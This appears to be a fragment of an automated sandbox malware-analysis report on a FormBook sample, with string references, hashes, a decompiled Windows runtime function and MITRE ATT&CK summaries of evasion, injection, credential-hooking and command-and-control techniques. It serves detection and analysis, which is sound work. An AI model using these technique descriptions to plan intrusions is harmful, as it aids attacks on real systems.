t, xrefs: 00692AF2
t, xrefs: 00692B1C
i, xrefs: 00692B00
x, xrefs: 00692ACF
2, xrefs: 00692B31
l, xrefs: 00692AD6
r, xrefs: 00692ADD
o, xrefs: 00692B07
e, xrefs: 00692AC1
m, xrefs: 00692B0E
I, xrefs: 00692AEB
, xrefs: 00692AC8
r, xrefs: 00692B23
r, xrefs: 00692ABA
l, xrefs: 00692AF9
t, xrefs: 00692AB0
I, xrefs: 00692AA6
\, xrefs: 00692B15

Memory Dump Source

Source File: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: ObjectSecurityUser
String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
API String ID: 3368538905-3236418099
Opcode ID: 416fe5739c7256bfa93bb2072e355a4fb90e1f22fecfc8b3768fce51cd6992e2
Instruction ID: d92eccb0175616ea59b2f202b08026a63967f6509482547fbc4282192f5355b0
Opcode Fuzzy Hash: 416fe5739c7256bfa93bb2072e355a4fb90e1f22fecfc8b3768fce51cd6992e2
Instruction Fuzzy Hash: 8681A0B190021CAAEF60DF95DC45FEEB7BEEF44704F00019DE608A6141EBB15A89CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0461FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0461FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E045CCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04615720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04615720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0461fdda
0x0461fde2
0x0461fde5
0x0461fdec
0x0461fdfa
0x0461fdff
0x0461fe0a
0x0461fe0f
0x0461fe17
0x0461fe1e
0x0461fe19
0x0461fe19
0x0461fe19
0x0461fe20
0x0461fe21
0x0461fe22
0x0461fe25
0x0461fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0461FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0461FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0461FE01

Memory Dump Source

Source File: 0000000E.00000002.618326850.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true

Associated: 0000000E.00000002.620140871.000000000467B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.620187411.000000000467F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 9a66512f1277d997a9e9a0bcfa618b6350156c34b75ca445b8fa90027d905564
Instruction ID: 191b6f7c2ca05b33905a5b93b39a743bb4d16f20ef6e3d90eabb488058e9293e
Opcode Fuzzy Hash: 9a66512f1277d997a9e9a0bcfa618b6350156c34b75ca445b8fa90027d905564
Instruction Fuzzy Hash: 8DF0F632200201BFE6251A55DC02F23BF6BEB84730F180318F628561E1EA62F860E6F4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Po-covid19 2372#w2..exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph